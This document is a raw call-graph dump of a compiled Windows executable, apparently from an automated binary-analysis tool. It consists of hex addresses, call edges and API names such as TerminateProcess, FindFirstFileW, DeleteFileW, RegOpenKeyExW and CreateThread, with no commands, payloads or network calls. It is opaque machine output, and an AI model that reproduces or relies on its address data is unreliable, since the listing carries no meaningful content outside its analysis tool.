10186b ___scrt_fastfail 103888->103890 103889->103890 103890->103868 103891->103868 103892->103870 103893->103873 103894->103857 103895->103868 103896->103868 103897->103868 103898->103868 103899->103868 103900->103868 103901->103453 103902->103455 103903->103461 103905 b014b 8 API calls 103904->103905 103906 9424e 103905->103906 103906->103467 103907->103470 103909 98ec0 52 API calls 103908->103909 103910 1189ed 103909->103910 103933 118a32 messages 103910->103933 103946 119730 103910->103946 103912 118cde 103913 118eac 103912->103913 103918 118cec 103912->103918 103996 119941 59 API calls 103913->103996 103916 118ebb 103917 118ec7 103916->103917 103916->103918 103917->103933 103959 1188e3 103918->103959 103919 98ec0 52 API calls 103935 118aa6 103919->103935 103924 118d25 103973 affe0 103924->103973 103927 118d45 103980 103fe1 81 API calls __wsopen_s 103927->103980 103928 118d5f 103981 97e12 103928->103981 103931 118d50 GetCurrentProcess TerminateProcess 103931->103928 103933->103473 103935->103912 103935->103919 103935->103933 103978 f4ad3 8 API calls __fread_nolock 103935->103978 103979 118f7a 41 API calls 103935->103979 103938 118f22 103938->103933 103942 118f36 FreeLibrary 103938->103942 103939 118d9e 103993 1195d8 74 API calls 103939->103993 103942->103933 103944 118daf 103944->103938 103994 a1ca0 8 API calls 103944->103994 103995 9b4c8 8 API calls 103944->103995 103997 1195d8 74 API calls 103944->103997 103947 9c2c9 8 API calls 103946->103947 103948 11974b CharLowerBuffW 103947->103948 103998 f9805 103948->103998 103952 9bf73 8 API calls 103953 119787 103952->103953 104005 9acc0 103953->104005 103955 11979b 103956 9adf4 8 API calls 103955->103956 103958 1197a5 _wcslen 103956->103958 103957 1198bb _wcslen 103957->103935 103958->103957 104017 118f7a 41 API calls 103958->104017 103960 118949 103959->103960 103961 1188fe 103959->103961 103965 119af3 103960->103965 103962 b017b 8 API calls 103961->103962 103963 118920 103962->103963 103963->103960 103964 b014b 8 API calls 103963->103964 103964->103963 103966 119d08 messages 103965->103966 103970 119b17 _strcat _wcslen ___std_exception_copy 103965->103970 103966->103924 103967 9c63f 39 API calls 103967->103970 103968 9c98d 39 API calls 103968->103970 103969 9ca5b 39 API calls 103969->103970 103970->103966 103970->103967 103970->103968 103970->103969 103971 98ec0 52 API calls 103970->103971 104021 ff8c5 10 API calls _wcslen 103970->104021 103971->103970 103974 afff5 103973->103974 103975 b008d Sleep 103974->103975 103976 b005b 103974->103976 103977 b007b CloseHandle 103974->103977 103975->103976 103976->103927 103976->103928 103977->103976 103978->103935 103979->103935 103980->103931 103982 97e1a 103981->103982 103983 b014b 8 API calls 103982->103983 103984 97e28 103983->103984 104022 98445 103984->104022 103987 98470 104025 9c760 103987->104025 103989 b017b 8 API calls 103991 9851c 103989->103991 103990 98480 103990->103989 103990->103991 103991->103944 103992 a1ca0 8 API calls 103991->103992 103992->103939 103993->103944 103994->103944 103995->103944 103996->103916 103997->103944 104000 f9825 _wcslen 103998->104000 103999 f9914 103999->103952 103999->103958 104000->103999 104001 f9919 104000->104001 104002 f985a 104000->104002 104001->103999 104019 ae36b 41 API calls 104001->104019 104002->103999 104018 ae36b 41 API calls 104002->104018 104007 9ace1 104005->104007 104016 9accf 104005->104016 104006 9acda __fread_nolock 104006->103955 104010 e0557 104007->104010 104011 9ad07 104007->104011 104007->104016 104008 9c2c9 8 API calls 104009 e05a3 __fread_nolock 104008->104009 104013 b014b 8 API calls 104010->104013 104020 988e8 8 API calls 104011->104020 104014 e0561 104013->104014 104015 b017b 8 API calls 104014->104015 104015->104016 104016->104006 104016->104008 104017->103957 104018->104002 104019->104001 104020->104006 104021->103970 104023 b014b 8 API calls 104022->104023 104024 97e30 104023->104024 104024->103987 104026 9c76b 104025->104026 104027 e1285 104026->104027 104032 9c773 messages 104026->104032 104028 b014b 8 API calls 104027->104028 104031 e1291 104028->104031 104029 9c77a 104029->103990 104031->104031 104032->104029 104033 9c7e0 8 API calls messages 104032->104033 104033->104032 104035 9bf73 8 API calls 104034->104035 104036 fdc73 104035->104036 104037 9bf73 8 API calls 104036->104037 104038 fdc7c 104037->104038 104039 9bf73 8 API calls 104038->104039 104040 fdc85 104039->104040 104058 95851 104040->104058 104045 fdcab 104070 9568e 104045->104070 104046 96b7c 8 API calls 104046->104045 104048 fdcbf FindFirstFileW 104049 fdd4b FindClose 104048->104049 104052 fdcde 104048->104052 104055 fdd56 104049->104055 104050 fdd26 FindNextFileW 104050->104052 104051 9bed9 8 API calls 104051->104052 104052->104049 104052->104050 104052->104051 104053 97bb5 8 API calls 104052->104053 104054 96b7c 8 API calls 104052->104054 104053->104052 104056 fdd17 DeleteFileW 104054->104056 104055->103486 104056->104050 104057 fdd42 FindClose 104056->104057 104057->104055 104112 d22d0 104058->104112 104061 95898 104118 9bd57 104061->104118 104062 9587d 104063 98577 8 API calls 104062->104063 104065 95889 104063->104065 104114 955dc 104065->104114 104068 feab0 GetFileAttributesW 104069 fdc99 104068->104069 104069->104045 104069->104046 104071 9bf73 8 API calls 104070->104071 104072 956a4 104071->104072 104073 9bf73 8 API calls 104072->104073 104074 956ac 104073->104074 104075 9bf73 8 API calls 104074->104075 104076 956b4 104075->104076 104077 9bf73 8 API calls 104076->104077 104078 956bc 104077->104078 104079 956f0 104078->104079 104080 d4da1 104078->104080 104081 9acc0 8 API calls 104079->104081 104082 9bed9 8 API calls 104080->104082 104083 956fe 104081->104083 104084 d4daa 104082->104084 104086 9adf4 8 API calls 104083->104086 104085 9bd57 8 API calls 104084->104085 104088 95733 104085->104088 104087 95708 104086->104087 104087->104088 104089 9acc0 8 API calls 104087->104089 104090 95778 104088->104090 104091 95754 104088->104091 104100 d4dcc 104088->104100 104093 95729 104089->104093 104092 9acc0 8 API calls 104090->104092 104091->104090 104124 9655e 104091->104124 104094 95789 104092->104094 104095 9adf4 8 API calls 104093->104095 104097 9579f 104094->104097 104103 9bed9 8 API calls 104094->104103 104095->104088 104101 957b3 104097->104101 104105 9bed9 8 API calls 104097->104105 104099 98577 8 API calls 104107 d4e8c 104099->104107 104100->104099 104102 957be 104101->104102 104106 9bed9 8 API calls 104101->104106 104108 9bed9 8 API calls 104102->104108 104110 957c9 104102->104110 104103->104097 104104 9acc0 8 API calls 104104->104090 104105->104101 104106->104102 104107->104090 104109 9655e 8 API calls 104107->104109 104127 9ad40 8 API calls __fread_nolock 104107->104127 104108->104110 104109->104107 104110->104048 104113 9585e GetFullPathNameW 104112->104113 104113->104061 104113->104062 104115 955ea 104114->104115 104116 9adf4 8 API calls 104115->104116 104117 955fe 104116->104117 104117->104068 104119 9bd71 104118->104119 104120 9bd64 104118->104120 104121 b014b 8 API calls 104119->104121 104120->104065 104122 9bd7b 104121->104122 104123 b017b 8 API calls 104122->104123 104123->104120 104125 9c2c9 8 API calls 104124->104125 104126 95761 104125->104126 104126->104090 104126->104104 104127->104107 104129 1018b6 104128->104129 104130 b014b 8 API calls 104129->104130 104131 1018bd 104130->104131 104134 ffcb5 104131->104134 104133 1018f7 104133->103494 104135 9c2c9 8 API calls 104134->104135 104136 ffcc8 CharLowerBuffW 104135->104136 104138 ffcdb 104136->104138 104137 ffce5 ___scrt_fastfail 104137->104133 104138->104137 104139 ffd19 104138->104139 104140 9655e 8 API calls 104138->104140 104141 ffd2b 104139->104141 104142 9655e 8 API calls 104139->104142 104140->104138 104143 b017b 8 API calls 104141->104143 104142->104141 104146 ffd59 104143->104146 104148 ffd7b 104146->104148 104167 ffbed 8 API calls 104146->104167 104147 ffdb8 104147->104137 104149 b014b 8 API calls 104147->104149 104152 ffe0c 104148->104152 104150 ffdd2 104149->104150 104151 b017b 8 API calls 104150->104151 104151->104137 104153 9bf73 8 API calls 104152->104153 104154 ffe3e 104153->104154 104155 9bf73 8 API calls 104154->104155 104156 ffe47 104155->104156 104157 9bf73 8 API calls 104156->104157 104164 ffe50 104157->104164 104158 98577 8 API calls 104158->104164 104159 b66f8 GetStringTypeW 104159->104164 104160 100114 104160->104147 104162 b6641 39 API calls 104162->104164 104163 ffe0c 40 API calls 104163->104164 104164->104158 104164->104159 104164->104160 104164->104162 104164->104163 104165 9ad40 8 API calls 104164->104165 104166 9bed9 8 API calls 104164->104166 104168 b6722 GetStringTypeW 104164->104168 104165->104164 104166->104164 104167->104146 104168->104164 104170 b017b 8 API calls 104169->104170 104171 ac209 104170->104171 104172 b014b 8 API calls 104171->104172 104173 ac215 104172->104173 104173->103506 104175 af9fe 104174->104175 104176 afa35 104174->104176 104177 b017b 8 API calls 104175->104177 104183 afe8a 8 API calls 104176->104183 104179 afa05 WideCharToMultiByte 104177->104179 104182 afa3e 8 API calls __fread_nolock 104179->104182 104181 afa29 104181->103511 104182->104181 104183->104181 104185 b014b 8 API calls 104184->104185 104186 9894a 104185->104186 104186->103601 104187->103600 104189 98a76 104188->104189 104190 98a80 104189->104190 104191 d6737 104189->104191 104192 d6744 104190->104192 104196 98b94 104190->104196 104198 98b9b 104190->104198 104203 ab7a2 8 API calls 104191->104203 104204 9b4c8 8 API calls 104192->104204 104195 d6762 104195->104195 104197 b014b 8 API calls 104196->104197 104197->104198 104198->103600 104199->103578 104200->103581 104201->103594 104202->103599 104203->104192 104204->104195 104206 116101 104205->104206 104207 11614f 104205->104207 104208 b017b 8 API calls 104206->104208 104207->103616 104210 116123 104208->104210 104209 b014b 8 API calls 104209->104210 104210->104207 104210->104209 104221 101400 8 API calls 104210->104221 104213 1014d2 104212->104213 104214 101499 104212->104214 104213->103640 104214->104213 104215 b014b 8 API calls 104214->104215 104215->104213 104216->103641 104217->103625 104218->103641 104219->103642 104220->103641 104221->104210 104223 a1a2e 104222->104223 104224 a19b6 104222->104224 104227 e6a4d 104223->104227 104245 a1a3d 104223->104245 104225 e6b60 104224->104225 104226 a19c3 104224->104226 104304 1185db 224 API calls 2 library calls 104225->104304 104235 e6b84 104226->104235 104236 a19cd 104226->104236 104229 e6a58 104227->104229 104230 e6b54 104227->104230 104302 ab35c 224 API calls 104229->104302 104303 103fe1 81 API calls __wsopen_s 104230->104303 104232 e6bb5 104238 e6be2 104232->104238 104239 e6bc0 104232->104239 104233 a0340 224 API calls 104233->104245 104235->104232 104243 e6b9c 104235->104243 104241 a19e0 messages 104236->104241 104242 9bed9 8 API calls 104236->104242 104237 a1ba9 104255 a1bb5 104237->104255 104299 103fe1 81 API calls __wsopen_s 104237->104299 104240 1160e6 8 API calls 104238->104240 104306 1185db 224 API calls 2 library calls 104239->104306 104248 e6bed 104240->104248 104247 e6dd9 104241->104247 104263 a1a23 messages 104241->104263 104309 11808f 53 API calls __wsopen_s 104241->104309 104242->104241 104305 103fe1 81 API calls __wsopen_s 104243->104305 104244 e6979 104301 103fe1 81 API calls __wsopen_s 104244->104301 104245->104233 104245->104237 104245->104241 104245->104244 104249 e6908 104245->104249 104245->104255 104267 a1af4 104245->104267 104254 e6e0f 104247->104254 104311 1181ce 65 API calls 104247->104311 104259 e6c81 104248->104259 104269 e6c08 104248->104269 104300 103fe1 81 API calls __wsopen_s 104249->104300 104313 9b4c8 8 API calls 104254->104313 104255->103258 104256 e6db7 104261 98ec0 52 API calls 104256->104261 104307 101ad8 8 API calls 104259->104307 104260 9bed9 8 API calls 104260->104241 104275 e6dbf _wcslen 104261->104275 104262 e6ded 104265 98ec0 52 API calls 104262->104265 104263->103258 104280 e6df5 _wcslen 104265->104280 104267->104237 104298 a1ca0 8 API calls 104267->104298 104273 10148b 8 API calls 104269->104273 104270 e6c93 104308 9bd07 8 API calls 104270->104308 104271 e691d messages 104271->104244 104271->104263 104281 a1b62 messages 104271->104281 104272 a1b55 104272->104237 104272->104281 104276 e6c32 104273->104276 104275->104247 104310 9b4c8 8 API calls 104275->104310 104279 a2b20 224 API calls 104276->104279 104277 e6c9c 104283 10148b 8 API calls 104277->104283 104279->104241 104280->104254 104312 9b4c8 8 API calls 104280->104312 104281->104241 104281->104260 104281->104263 104283->104241 104289 a1e6d messages 104284->104289 104285 a2512 104292 a1ff7 messages 104285->104292 104317 abe08 39 API calls 104285->104317 104288 e7837 104288->104292 104316 bd2d5 39 API calls 104288->104316 104289->104285 104289->104288 104290 e766b 104289->104290 104289->104292 104315 ae322 8 API calls messages 104289->104315 104314 bd2d5 39 API calls 104290->104314 104292->103258 104294->103246 104295->103256 104296->103256 104297->103256 104298->104272 104299->104263 104300->104271 104301->104241 104302->104281 104303->104225 104304->104241 104305->104263 104306->104241 104307->104270 104308->104277 104309->104256 104310->104247 104311->104262 104312->104254 104313->104263 104314->104290 104315->104289 104316->104292 104317->104292 104319 fe819 104318->104319 104320 fe830 104319->104320 104323 fe836 104319->104323 104325 b6722 GetStringTypeW 104319->104325 104326 b666b 39 API calls 104320->104326 104323->103277 104324->103277 104325->104319 104326->104323 104327 9da4a 104328 9da54 104327->104328 104337 9dbc4 104327->104337 104329 9cf80 39 API calls 104328->104329 104328->104337 104330 9dace 104329->104330 104331 b014b 8 API calls 104330->104331 104332 9dae7 104331->104332 104333 b017b 8 API calls 104332->104333 104334 9db05 104333->104334 104335 b014b 8 API calls 104334->104335 104338 9db16 __fread_nolock 104335->104338 104336 b014b 8 API calls 104340 9db7f 104336->104340 104339 b017b 8 API calls 104337->104339 104341 9d5e1 104337->104341 104344 9dc19 104337->104344 104338->104336 104338->104337 104339->104337 104340->104337 104342 9cf80 39 API calls 104340->104342 104343 b014b 8 API calls 104341->104343 104342->104337 104346 9d66e messages 104343->104346 104345 9d911 messages 104355 9d9ac messages 104345->104355 104357 9c3ab 104345->104357 104346->104345 104350 e1f79 104346->104350 104351 e1f94 104346->104351 104353 9bed9 8 API calls 104346->104353 104354 9c3ab 8 API calls 104346->104354 104366 9b4c8 8 API calls 104346->104366 104367 f56ae 8 API calls messages 104350->104367 104353->104346 104354->104346 104356 9d9c3 104355->104356 104365 ae30a 8 API calls messages 104355->104365 104358 9c3b9 104357->104358 104364 9c3e1 messages 104357->104364 104359 9c3c7 104358->104359 104360 9c3ab 8 API calls 104358->104360 104361 9c3cd 104359->104361 104362 9c3ab 8 API calls 104359->104362 104360->104359 104361->104364 104368 9c7e0 8 API calls messages 104361->104368 104362->104361 104364->104355 104365->104355 104366->104346 104367->104351 104368->104364 105825 bf06e 105826 bf07a CallCatchBlock 105825->105826 105827 bf09b 105826->105827 105828 bf086 105826->105828 105838 b94fd EnterCriticalSection 105827->105838 105844 bf649 20 API calls __dosmaperr 105828->105844 105831 bf0a7 105839 bf0db 105831->105839 105832 bf08b 105845 c2b5c 26 API calls pre_c_initialization 105832->105845 105837 bf096 __fread_nolock 105838->105831 105847 bf106 105839->105847 105841 bf0e8 105843 bf0b4 105841->105843 105867 bf649 20 API calls __dosmaperr 105841->105867 105846 bf0d1 LeaveCriticalSection __fread_nolock 105843->105846 105844->105832 105845->105837 105846->105837 105848 bf12e 105847->105848 105849 bf114 105847->105849 105850 bdcc5 __fread_nolock 26 API calls 105848->105850 105871 bf649 20 API calls __dosmaperr 105849->105871 105852 bf137 105850->105852 105868 c9789 105852->105868 105853 bf119 105872 c2b5c 26 API calls pre_c_initialization 105853->105872 105857 bf23b 105858 bf248 105857->105858 105866 bf1ee 105857->105866 105874 bf649 20 API calls __dosmaperr 105858->105874 105859 bf1bf 105860 bf1dc 105859->105860 105859->105866 105873 bf41f 31 API calls 4 library calls 105860->105873 105863 bf124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 105863->105841 105864 bf1e6 105864->105863 105866->105863 105875 bf29b 30 API calls 2 library calls 105866->105875 105867->105843 105876 c9606 105868->105876 105870 bf153 105870->105857 105870->105859 105870->105863 105871->105853 105872->105863 105873->105864 105874->105863 105875->105863 105877 c9612 CallCatchBlock 105876->105877 105878 c961a 105877->105878 105879 c9632 105877->105879 105911 bf636 20 API calls __dosmaperr 105878->105911 105881 c96e6 105879->105881 105885 c966a 105879->105885 105916 bf636 20 API calls __dosmaperr 105881->105916 105882 c961f 105912 bf649 20 API calls __dosmaperr 105882->105912 105901 c54ba EnterCriticalSection 105885->105901 105886 c96eb 105917 bf649 20 API calls __dosmaperr 105886->105917 105887 c9627 __fread_nolock 105887->105870 105890 c9670 105892 c96a9 105890->105892 105893 c9694 105890->105893 105891 c96f3 105918 c2b5c 26 API calls pre_c_initialization 105891->105918 105902 c970b 105892->105902 105913 bf649 20 API calls __dosmaperr 105893->105913 105897 c9699 105914 bf636 20 API calls __dosmaperr 105897->105914 105898 c96a4 105915 c96de LeaveCriticalSection __wsopen_s 105898->105915 105901->105890 105903 c5737 __wsopen_s 26 API calls 105902->105903 105904 c971d 105903->105904 105905 c9725 105904->105905 105906 c9736 SetFilePointerEx 105904->105906 105919 bf649 20 API calls __dosmaperr 105905->105919 105908 c974e GetLastError 105906->105908 105910 c972a 105906->105910 105920 bf613 20 API calls __dosmaperr 105908->105920 105910->105898 105911->105882 105912->105887 105913->105897 105914->105898 105915->105887 105916->105886 105917->105891 105918->105887 105919->105910 105920->105910 104369 9f4c0 104372 aa025 104369->104372 104371 9f4cc 104373 aa046 104372->104373 104378 aa0a3 104372->104378 104375 a0340 224 API calls 104373->104375 104373->104378 104379 aa077 104375->104379 104376 e806b 104376->104376 104377 aa0e7 104377->104371 104378->104377 104381 103fe1 81 API calls __wsopen_s 104378->104381 104379->104377 104379->104378 104380 9bed9 8 API calls 104379->104380 104380->104378 104381->104376 105921 9f5e5 105922 9cab0 224 API calls 105921->105922 105923 9f5f3 105922->105923 104382 91044 104387 92793 104382->104387 104384 9104a 104423 b0413 29 API calls __onexit 104384->104423 104386 91054 104424 92a38 104387->104424 104391 9280a 104392 9bf73 8 API calls 104391->104392 104393 92814 104392->104393 104394 9bf73 8 API calls 104393->104394 104395 9281e 104394->104395 104396 9bf73 8 API calls 104395->104396 104397 92828 104396->104397 104398 9bf73 8 API calls 104397->104398 104399 92866 104398->104399 104400 9bf73 8 API calls 104399->104400 104401 92932 104400->104401 104434 92dbc 104401->104434 104405 92964 104406 9bf73 8 API calls 104405->104406 104407 9296e 104406->104407 104408 a3160 9 API calls 104407->104408 104409 92999 104408->104409 104461 93166 104409->104461 104411 929b5 104412 929c5 GetStdHandle 104411->104412 104413 92a1a 104412->104413 104414 d39e7 104412->104414 104417 92a27 OleInitialize 104413->104417 104414->104413 104415 d39f0 104414->104415 104416 b014b 8 API calls 104415->104416 104418 d39f7 104416->104418 104417->104384 104468 100ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 104418->104468 104420 d3a00 104469 1012eb CreateThread 104420->104469 104422 d3a0c CloseHandle 104422->104413 104423->104386 104470 92a91 104424->104470 104427 92a91 8 API calls 104428 92a70 104427->104428 104429 9bf73 8 API calls 104428->104429 104430 92a7c 104429->104430 104431 98577 8 API calls 104430->104431 104432 927c9 104431->104432 104433 9327e 6 API calls 104432->104433 104433->104391 104435 9bf73 8 API calls 104434->104435 104436 92dcc 104435->104436 104437 9bf73 8 API calls 104436->104437 104438 92dd4 104437->104438 104477 981d6 104438->104477 104441 981d6 8 API calls 104442 92de4 104441->104442 104443 9bf73 8 API calls 104442->104443 104444 92def 104443->104444 104445 b014b 8 API calls 104444->104445 104446 9293c 104445->104446 104447 93205 104446->104447 104448 93213 104447->104448 104449 9bf73 8 API calls 104448->104449 104450 9321e 104449->104450 104451 9bf73 8 API calls 104450->104451 104452 93229 104451->104452 104453 9bf73 8 API calls 104452->104453 104454 93234 104453->104454 104455 9bf73 8 API calls 104454->104455 104456 9323f 104455->104456 104457 981d6 8 API calls 104456->104457 104458 9324a 104457->104458 104459 b014b 8 API calls 104458->104459 104460 93251 RegisterWindowMessageW 104459->104460 104460->104405 104462 d3c8f 104461->104462 104463 93176 104461->104463 104480 103c4e 8 API calls 104462->104480 104464 b014b 8 API calls 104463->104464 104466 9317e 104464->104466 104466->104411 104467 d3c9a 104468->104420 104469->104422 104481 1012d1 14 API calls 104469->104481 104471 9bf73 8 API calls 104470->104471 104472 92a9c 104471->104472 104473 9bf73 8 API calls 104472->104473 104474 92aa4 104473->104474 104475 9bf73 8 API calls 104474->104475 104476 92a66 104475->104476 104476->104427 104478 9bf73 8 API calls 104477->104478 104479 92ddc 104478->104479 104479->104441 104480->104467 104482 c8782 104487 c853e 104482->104487 104485 c87aa 104492 c856f try_get_first_available_module 104487->104492 104489 c876e 104506 c2b5c 26 API calls pre_c_initialization 104489->104506 104491 c86c3 104491->104485 104499 d0d04 104491->104499 104492->104492 104495 c86b8 104492->104495 104502 b917b 40 API calls 2 library calls 104492->104502 104494 c870c 104494->104495 104503 b917b 40 API calls 2 library calls 104494->104503 104495->104491 104505 bf649 20 API calls __dosmaperr 104495->104505 104497 c872b 104497->104495 104504 b917b 40 API calls 2 library calls 104497->104504 104507 d0401 104499->104507 104501 d0d1f 104501->104485 104502->104494 104503->104497 104504->104495 104505->104489 104506->104491 104510 d040d CallCatchBlock 104507->104510 104508 d041b 104565 bf649 20 API calls __dosmaperr 104508->104565 104510->104508 104512 d0454 104510->104512 104511 d0420 104566 c2b5c 26 API calls pre_c_initialization 104511->104566 104518 d09db 104512->104518 104515 d042a __fread_nolock 104515->104501 104568 d07af 104518->104568 104521 d0a0d 104600 bf636 20 API calls __dosmaperr 104521->104600 104522 d0a26 104586 c5594 104522->104586 104525 d0a2b 104527 d0a4b 104525->104527 104528 d0a34 104525->104528 104526 d0a12 104601 bf649 20 API calls __dosmaperr 104526->104601 104599 d071a CreateFileW 104527->104599 104602 bf636 20 API calls __dosmaperr 104528->104602 104532 d0a39 104603 bf649 20 API calls __dosmaperr 104532->104603 104534 d0b01 GetFileType 104535 d0b0c GetLastError 104534->104535 104536 d0b53 104534->104536 104606 bf613 20 API calls __dosmaperr 104535->104606 104608 c54dd 21 API calls 2 library calls 104536->104608 104537 d0ad6 GetLastError 104605 bf613 20 API calls __dosmaperr 104537->104605 104539 d0a84 104539->104534 104539->104537 104604 d071a CreateFileW 104539->104604 104541 d0b1a CloseHandle 104541->104526 104543 d0b43 104541->104543 104607 bf649 20 API calls __dosmaperr 104543->104607 104545 d0ac9 104545->104534 104545->104537 104547 d0b74 104549 d0bc0 104547->104549 104609 d092b 72 API calls 3 library calls 104547->104609 104548 d0b48 104548->104526 104553 d0bed 104549->104553 104610 d04cd 72 API calls 3 library calls 104549->104610 104552 d0be6 104552->104553 104554 d0bfe 104552->104554 104611 c8a2e 104553->104611 104556 d0478 104554->104556 104557 d0c7c CloseHandle 104554->104557 104567 d04a1 LeaveCriticalSection __wsopen_s 104556->104567 104626 d071a CreateFileW 104557->104626 104559 d0ca7 104560 d0cb1 GetLastError 104559->104560 104561 d0cdd 104559->104561 104627 bf613 20 API calls __dosmaperr 104560->104627 104561->104556 104563 d0cbd 104628 c56a6 21 API calls 2 library calls 104563->104628 104565->104511 104566->104515 104567->104515 104569 d07ea 104568->104569 104570 d07d0 104568->104570 104629 d073f 104569->104629 104570->104569 104636 bf649 20 API calls __dosmaperr 104570->104636 104573 d0822 104576 d0851 104573->104576 104638 bf649 20 API calls __dosmaperr 104573->104638 104574 d07df 104637 c2b5c 26 API calls pre_c_initialization 104574->104637 104584 d08a4 104576->104584 104640 bda7d 26 API calls 2 library calls 104576->104640 104579 d089f 104581 d091e 104579->104581 104579->104584 104580 d0846 104639 c2b5c 26 API calls pre_c_initialization 104580->104639 104641 c2b6c 11 API calls _abort 104581->104641 104584->104521 104584->104522 104585 d092a 104587 c55a0 CallCatchBlock 104586->104587 104644 c32d1 EnterCriticalSection 104587->104644 104589 c55ee 104645 c569d 104589->104645 104591 c55cc 104648 c5373 104591->104648 104593 c5617 __fread_nolock 104593->104525 104595 c55a7 104595->104589 104595->104591 104596 c563a EnterCriticalSection 104595->104596 104596->104589 104598 c5647 LeaveCriticalSection 104596->104598 104598->104595 104599->104539 104600->104526 104601->104556 104602->104532 104603->104526 104604->104545 104605->104526 104606->104541 104607->104548 104608->104547 104609->104549 104610->104552 104674 c5737 104611->104674 104613 c8a44 104687 c56a6 21 API calls 2 library calls 104613->104687 104614 c8a3e 104614->104613 104616 c5737 __wsopen_s 26 API calls 104614->104616 104625 c8a76 104614->104625 104619 c8a6d 104616->104619 104617 c5737 __wsopen_s 26 API calls 104620 c8a82 CloseHandle 104617->104620 104618 c8a9c 104621 c8abe 104618->104621 104688 bf613 20 API calls __dosmaperr 104618->104688 104623 c5737 __wsopen_s 26 API calls 104619->104623 104620->104613 104624 c8a8e GetLastError 104620->104624 104621->104556 104623->104625 104624->104613 104625->104613 104625->104617 104626->104559 104627->104563 104628->104561 104632 d0757 104629->104632 104630 d0772 104630->104573 104632->104630 104642 bf649 20 API calls __dosmaperr 104632->104642 104633 d0796 104643 c2b5c 26 API calls pre_c_initialization 104633->104643 104635 d07a1 104635->104573 104636->104574 104637->104569 104638->104580 104639->104576 104640->104579 104641->104585 104642->104633 104643->104635 104644->104595 104656 c3319 LeaveCriticalSection 104645->104656 104647 c56a4 104647->104593 104657 c4ff0 104648->104657 104650 c5392 104665 c2d38 104650->104665 104651 c5385 104651->104650 104664 c3778 11 API calls 2 library calls 104651->104664 104654 c53e4 104654->104589 104655 c54ba EnterCriticalSection 104654->104655 104655->104589 104656->104647 104662 c4ffd __dosmaperr 104657->104662 104658 c503d 104672 bf649 20 API calls __dosmaperr 104658->104672 104659 c5028 RtlAllocateHeap 104660 c503b 104659->104660 104659->104662 104660->104651 104662->104658 104662->104659 104671 b521d 7 API calls 2 library calls 104662->104671 104664->104651 104666 c2d6c __dosmaperr 104665->104666 104667 c2d43 RtlFreeHeap 104665->104667 104666->104654 104667->104666 104668 c2d58 104667->104668 104673 bf649 20 API calls __dosmaperr 104668->104673 104670 c2d5e GetLastError 104670->104666 104671->104662 104672->104660 104673->104670 104675 c5744 104674->104675 104677 c5759 104674->104677 104689 bf636 20 API calls __dosmaperr 104675->104689 104680 c577e 104677->104680 104691 bf636 20 API calls __dosmaperr 104677->104691 104679 c5749 104690 bf649 20 API calls __dosmaperr 104679->104690 104680->104614 104681 c5789 104692 bf649 20 API calls __dosmaperr 104681->104692 104684 c5751 104684->104614 104685 c5791 104693 c2b5c 26 API calls pre_c_initialization 104685->104693 104687->104618 104688->104621 104689->104679 104690->104684 104691->104681 104692->104685 104693->104684 104694 91098 104699 95fc8 104694->104699 104698 910a7 104700 9bf73 8 API calls 104699->104700 104701 95fdf GetVersionExW 104700->104701 104702 98577 8 API calls 104701->104702 104703 9602c 104702->104703 104704 9adf4 8 API calls 104703->104704 104718 96062 104703->104718 104705 96056 104704->104705 104707 955dc 8 API calls 104705->104707 104706 9611c GetCurrentProcess IsWow64Process 104708 96138 104706->104708 104707->104718 104709 d5269 GetSystemInfo 104708->104709 104710 96150 LoadLibraryA 104708->104710 104711 9619d GetSystemInfo 104710->104711 104712 96161 GetProcAddress 104710->104712 104713 96177 104711->104713 104712->104711 104715 96171 GetNativeSystemInfo 104712->104715 104716 9617b FreeLibrary 104713->104716 104717 9109d 104713->104717 104714 d5224 104715->104713 104716->104717 104719 b0413 29 API calls __onexit 104717->104719 104718->104706 104718->104714 104719->104698 104720 9105b 104725 952a7 104720->104725 104722 9106a 104756 b0413 29 API calls __onexit 104722->104756 104724 91074 104726 952b7 __wsopen_s 104725->104726 104727 9bf73 8 API calls 104726->104727 104728 9536d 104727->104728 104757 95594 104728->104757 104730 95376 104764 95238 104730->104764 104733 96b7c 8 API calls 104734 9538f 104733->104734 104770 96a7c 104734->104770 104737 9bf73 8 API calls 104738 953a7 104737->104738 104739 9bd57 8 API calls 104738->104739 104740 953b0 RegOpenKeyExW 104739->104740 104741 d4be6 RegQueryValueExW 104740->104741 104745 953d2 104740->104745 104742 d4c7c RegCloseKey 104741->104742 104743 d4c03 104741->104743 104742->104745 104754 d4c8e _wcslen 104742->104754 104744 b017b 8 API calls 104743->104744 104746 d4c1c 104744->104746 104745->104722 104747 9423c 8 API calls 104746->104747 104748 d4c27 RegQueryValueExW 104747->104748 104749 d4c44 104748->104749 104751 d4c5e messages 104748->104751 104750 98577 8 API calls 104749->104750 104750->104751 104751->104742 104752 9b329 8 API calls 104752->104754 104753 96a7c 8 API calls 104753->104754 104754->104745 104754->104752 104754->104753 104755 9655e 8 API calls 104754->104755 104755->104754 104756->104724 104758 d22d0 __wsopen_s 104757->104758 104759 955a1 GetModuleFileNameW 104758->104759 104760 9b329 8 API calls 104759->104760 104761 955c7 104760->104761 104762 95851 9 API calls 104761->104762 104763 955d1 104762->104763 104763->104730 104765 d22d0 __wsopen_s 104764->104765 104766 95245 GetFullPathNameW 104765->104766 104767 95267 104766->104767 104768 98577 8 API calls 104767->104768 104769 95285 104768->104769 104769->104733 104771 96a8b 104770->104771 104775 96aac __fread_nolock 104770->104775 104773 b017b 8 API calls 104771->104773 104772 b014b 8 API calls 104774 9539e 104772->104774 104773->104775 104774->104737 104775->104772 105924 9dd3d 105925 9dd63 105924->105925 105926 e19c2 105924->105926 105927 9dead 105925->105927 105930 b014b 8 API calls 105925->105930 105929 e1a82 105926->105929 105933 e1a26 105926->105933 105937 e1a46 105926->105937 105934 b017b 8 API calls 105927->105934 105976 103fe1 81 API calls __wsopen_s 105929->105976 105936 9dd8d 105930->105936 105931 e1a7d 105974 ae6e8 224 API calls 105933->105974 105943 9dee4 __fread_nolock 105934->105943 105938 b014b 8 API calls 105936->105938 105936->105943 105937->105931 105975 103fe1 81 API calls __wsopen_s 105937->105975 105940 9dddb 105938->105940 105939 b017b 8 API calls 105939->105943 105940->105933 105941 9de16 105940->105941 105942 a0340 224 API calls 105941->105942 105944 9de29 105942->105944 105943->105937 105943->105939 105944->105931 105944->105943 105945 e1aa5 105944->105945 105946 9de77 105944->105946 105948 9d526 105944->105948 105977 103fe1 81 API calls __wsopen_s 105945->105977 105946->105927 105946->105948 105949 b014b 8 API calls 105948->105949 105950 9d589 105949->105950 105966 9c32d 105950->105966 105953 b014b 8 